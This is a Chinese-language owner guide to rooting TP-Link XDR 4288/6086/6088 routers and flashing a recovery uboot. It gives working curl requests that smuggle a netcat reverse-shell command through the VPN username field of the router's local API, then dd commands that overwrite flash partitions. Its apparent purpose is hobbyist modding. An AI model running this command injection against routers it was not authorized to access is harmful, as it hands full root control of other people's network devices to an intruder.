TP Link 4288/6086/6088 不死 uboot

作品简介

root 方法:

  1. 安装 nmap,我们主要是要用到里面的 ncat
  2. 打开一个终端窗口,运行 ncat -nvlp 4444,开始侦听
  3. 按 F12 打开浏览器调试控制台,找到形如 http://192.168.1.1/stok=/ds 的 URL,chrome 浏览器的话,在“网络”标签页找到“名称”是 “ds” 的请求,单击它,然后在右侧窗口单击“标头”就可以看到了
  4. 接下来,如果你是用的 Windows,在 WSL 终端里进行以下操作。而 Linux 或 macOS 的终端本身可以直接操作
  5. 先把 stok 存入环境变量
export stok=

然后运行以下命令

curl http://192.168.1.1/stok=${stok}/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","name":"user_1","para":{"username":";mkfifo /tmp/p;sh -i&1|nc 192.168.1.254 4444 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"0"}},"method":"add"}'  

如果成功运行,则会返回 {"error_code":0}

继续运行以下命令

curl http://192.168.1.1/stok=${stok}/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"user_1":{"username":";mkfifo /tmp/p;sh -i&1|nc 192.168.1.254 4444 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"1"}},"method":"set"}'

如果成功运行,则会返回 {"error_code":0}

此时,在步骤2中打开的终端窗口中,你应该会看到如下提示:

sh: can't access tty; job control turned off
BusyBox v1.19.4 (2022-07-20 12:29:22 UTC) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ #


这就成功地开启了具有 root 权限的控制台命令行提示符了。

-----------------------------------------------------------------------------------------------------------


原厂固件获取 root ssh 后,先用 winscp 把解压后的文件上传到路由器的 /tmp 运行以下命令即可

cd /tmp

dd bs=131072 conv=sync of=/dev/mtdblock9 if=xdr608x-bl2.bin

dd bs=131072 conv=sync of=/dev/mtdblock9 seek=28 if=xdr608x-fip.bin

sync

重启后即可按住 reset 进入 http://192.168.1.1 的uboot web 界面中,刷入 sysupgrade 格式或者官方格式的固件均可以


创作时间: